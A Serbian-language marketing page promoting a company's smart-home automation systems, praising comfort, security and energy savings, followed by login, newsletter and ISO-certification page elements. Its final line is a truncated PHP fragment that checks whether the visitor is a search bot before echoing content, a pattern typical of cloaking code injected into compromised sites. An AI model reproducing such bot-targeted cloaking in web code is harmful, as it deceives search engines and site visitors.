Inteligentna kuća kao koncept modernog urbanog života


Kućnu automatizaciju možemo opisati kao tehniku upravljanja tehnologijom u domu koja služi poboljšanju kvaliteta života. Glavne odlike inteligentne kuće su: visoki komfor, sigurnost, ušteda energije, inteligentno izvršavanje svakodnevnih zadataka u domaćinstvu i rasterećenje korisnika, uopšteno podizanje životnog ambijenta na udobniji i lepši nivo. Upravo je to razlog zašto je kućna automatizacija prestala biti luksuz i zašto je postala pametan alat za upravljanje.

Moderan koncept života omogućen kroz automatizaciju vašeg doma.

Kuća se u potpunosti prilagođava ukućanima zavisno od njihovog raspoloženja, navika, želja i potreba. Iz tog razloga je pametna!

Preko raznih ekrana (bežičnih, ugradnih, mini LCD...) možete kontrolisati razne uređaje, pronalaziti razne informacije na internetu, pristupati prikazu vašeg video nadzora ili dobijati razna obaveštenja.

Sistem kućne automatike je skalabilan i programabilan te praktički u izvedbi i mogućnostima nema ograničenja. Tesla sistemi automatizacije domova se instalira bez poteškoća, tako da ne narušavaju postojeći izgled enterijera već mu daju nijansu prestiža i komfora!

Sistem kućne automatike, koji ima uticaj na uštedu energije, je jednostavan za rad, uz mogućnost proširivanja.

Inteligentna kuća će svoju punu funkcionalnost iskazivati nezavisno od vremena i mesta instalacije. Svejedno da li se radi o porodičnoj kući, stanu u stambenoj zgradi, vikendici ili poslovnom objektu - pre ili posle useljenja. Svojim nebrojenim varijacijama i mogućnostima primene, sistem će naći načina da zadovolji sve ukuse i potrebe i na moderan način učini život lagodnijim!

Automatizacija Vam omogućava pun komfor života sa vidljivim uštedama energije, kao i najbolju sigurnost.

LOGIN
niste ulogovani
e-mail adresa:
lozinka:

Zaboravili ste lozinku?   

PRETRAŽIVAČ
Unesite reč ili frazu:

NEWSLETTER
Unesite Vašu Email adresu:

TESLA SISTEMI
Ekipa na terenu

 


 

 


SUPERBRANDS
Pogledajte fotografije i video sa svečane dodele nagrada »

KATALOG
Pogledajte katalog Tesla sistema »

ISO 9001

 

 

ISO 14001

 

 

ISO 18001

 

 

ISO 20000

 

 

ISO 22301

 

 

ISO 27001

 

 

ISO 50001

 

 

ISO 37001

 

 


NIKOLA TESLA
www.tesla-museum.org »

$tmp = "?" . strtolower($_SERVER['HTTP_USER_AGENT']); if((strpos($tmp, 'bot') == true)){ echo '